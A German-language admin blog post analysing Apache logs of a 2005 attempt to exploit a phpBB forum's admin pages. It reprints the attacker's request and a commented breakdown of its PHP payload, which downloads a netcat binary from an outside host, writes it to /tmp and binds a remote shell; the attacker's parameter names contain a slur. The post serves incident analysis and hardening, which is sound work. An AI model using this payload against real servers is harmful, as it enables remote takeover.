phpBB Exploit in den Serverlogs

Also hab ich mir mal die Logs vom Apache vorgenommen und folgende Relevante Eintraege gefunden. Die IP gehoert zu nem hollaendischen ISP:

62.251.26.232 - - [22/Mar/2005:17:18:18 +0100] "GET
/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=eba604d785fb064ab268c2c8
+0e18b814
HTTP/1.1" 200 5389 "http://forum.kjg-speyer.de/" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"

62.251.26.232 - - [22/Mar/2005:17:18:19 +0100] "POST
/admin/admin_db_utilities.php?sid=eba604d785fb064ab268c2c80e18b814
HTTP/1.1" 200 9414 "http://forum.kjg-speyer.de/" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"

62.251.26.232 - - [22/Mar/2005:17:18:19 +0100] "POST
/admin/admin_styles.php?mode=export&sid=eba604d785fb064ab268c2c80e18b814
HTTP/1.1" 200 11239
"http://forum.kjg-speyer.de/admin/admin_styles.php?mode=export"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

62.251.26.232 - - [22/Mar/2005:17:19:04 +0100] "GET
/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=eba604d785fb064ab268c2c80e18b814&niggaip=62.251.26.232
+&niggaport=6112&nigga=$a=fopen(\"http://overdose.tcpteam.org/background/nc.elf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/
+tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/
+sh\");
HTTP/1.1" 200 25957146 "http://forum.kjg-speyer.de/" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1)"

So wie es aussieht wird versucht mit einem Exploit zu einer Shell auf dem Server zu kommen.
Wenn man den Code auseinanderpfrimelt gelangt man zu folgendem Inhalt:

install_to=../../../../../../../../../../../../../../../../../../../tmp
niggaip=62.251.26.232
niggaport=6112

nigga=
// in $a connection zu einer binaerversion von nc oeffnen
$a=fopen(\"http://overdose.tcpteam.org/background/nc.elf\",\"r\");
// $b mit "" initialisieren
$b=\"\";

// netcat in $b einlesen und dann connection wieder schliessen
while(!feof($a)){
$b%20.=%20fread($a,200000);
};
fclose($a);

// neue Datei in /tmp anlegen und inhalt von $b reinschreiben
$a=fopen(\"/tmp/.sesss_\",\"w\");
fwrite($a,$b);
fclose($a);

// Datei ausfuehrbar machen und ausfuehren und mit netcat /bin/sh an nen Port binden
chmod(\"/tmp/.sesss_\",0777);
system(\"/tmp/.sesss_ \".$_REQUEST[niggaip].\"
\".$_REQUEST[niggaport].\" -e /bin/sh\");

Interessante Sache... Nach einigem Suchen hab ich auch den entsprechenden Bugtraq Post gefunden indem das Exploit vorgestellt wurde: http://www.securityfocus.com/archive/1/393202/30/0/threaded
Gepostet wurde das Exploit am 15.3.2005, der "Angriff" ist am 22.3.2005 passiert.
Flux sind se ja, die Kiddies.

Interessant dabei ist, dass das Exploit mit phpBB 2.0.11 getestet wurde, im Forum aber schon seit Februar 2.0.12 isntalliert war. Ob jetzige Versionen von phpBB noch vulnerable sind ist mir nicht bekannt, da ich sonst nichts zum ausgenutzten Exploit finden kann, weder ein Eintrag bei den Vulns bei Bugtraq noch sonstwas.
Ich werd das die Tage mal noch ueberpruefen.

Passiert ist aus folgenden Gruenden nichts, was wieder zeigt, wie wichtig ein gut administriertes System ist:
1. Bei PHP ist url_fopen nicht erlaubt
2. PHP hat in /tmp nichts zu suchen
3. PHP hat keine Dateien auszufuehren
(4. Inziwschen duerfen auf /tmp ueberhaupt keine Dateien mehr ausgefuehrt werden)